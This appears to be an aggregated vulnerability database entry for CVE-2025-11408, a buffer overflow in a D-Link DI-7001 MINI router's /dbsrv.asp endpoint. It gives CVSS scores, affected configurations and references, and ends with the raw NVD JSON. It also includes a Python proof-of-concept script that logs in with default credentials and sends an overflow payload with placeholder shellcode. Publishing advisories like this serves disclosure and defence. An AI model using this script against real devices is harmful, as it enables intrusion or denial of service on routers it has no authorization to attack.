CVE-2025-11408

Description

A security vulnerability has been detected in D-Link DI-7001 MINI 24.04.18B1. The affected element is an unknown function of the file /dbsrv.asp. Such manipulation of the argument str leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7001mini-8g_firmware:24.04.18b1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:di-7001mini-8g:b1:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DI-7001 MINI 固件 24.04.18B1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11408 - D-Link DI-7001 MINI Buffer Overflow PoC
# Vulnerability: Buffer overflow in /dbsrv.asp via 'str' parameter
# Affected: D-Link DI-7001 MINI firmware 24.04.18B1

import requests
import sys

TARGET_URL = "http://<target_ip>/dbsrv.asp"
USERNAME = "admin"
PASSWORD = "password"

def exploit(target, username, password):
    """
    Exploit buffer overflow in D-Link DI-7001 MINI /dbsrv.asp
    The 'str' parameter is vulnerable to buffer overflow.
    """
    session = requests.Session()

    # Step 1: Authenticate to obtain low-privilege session
    login_url = f"http://{target}/login.asp"
    login_data = {
        "username": username,
        "password": password
    }
    try:
        session.post(login_url, data=login_data, timeout=10)
    except Exception as e:
        print(f"[+] Authentication phase: {e}")

    # Step 2: Craft buffer overflow payload for 'str' parameter
    # The overflow payload overwrites return address with controlled data
    padding = b"A" * 256  # Adjust offset based on buffer size
    ret_address = b"\x41\x41\x41\x41"  # Controlled return address placeholder
    shellcode = b"\x90" * 100  # NOP sled + shellcode placeholder

    payload = padding + ret_address + shellcode

    # Step 3: Send malicious request to trigger overflow
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    data = {
        "str": payload.decode('latin-1')
    }

    try:
        response = session.post(
            f"http://{target}/dbsrv.asp",
            data=data,
            headers=headers,
            timeout=10
        )
        print(f"[+] Payload sent. Status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[+] Target may have crashed - possible successful overflow")
    except Exception as e:
        print(f"[+] Exploit result: {e}")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    exploit(target, USERNAME, PASSWORD)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11408
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11408
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11408/
[4] VulDB https://vuldb.com/cve/CVE-2025-11408
[5] https://github.com/DavCloudz/cve/issues/5
[6] https://vuldb.com/?ctiid.327345
[7] https://vuldb.com/?id.327345
[8] https://vuldb.com/?submit.665474
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11408", "sourceIdentifier": "[email protected]", "published": "2025-10-07T21:15:37.480", "lastModified": "2025-11-19T20:30:10.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in D-Link DI-7001 MINI 24.04.18B1. The affected element is an unknown function of the file /dbsrv.asp. Such manipulation of the argument str leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7001mini-8g_firmware:24.04.18b1:*:*:*:*:*:*:*", "matchCriteriaId": "98F1181A-9265-4808-9983-8BF8B769D277"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7001mini-8g:b1:*:*:*:*:*:*:*", "matchCriteriaId": "B6AFB9DF-DE81-4481-8D9A-0BA4B76AD606"}]}]}], "references": [{"url": "https://github.com/DavCloudz/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327345", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327345", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665474", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}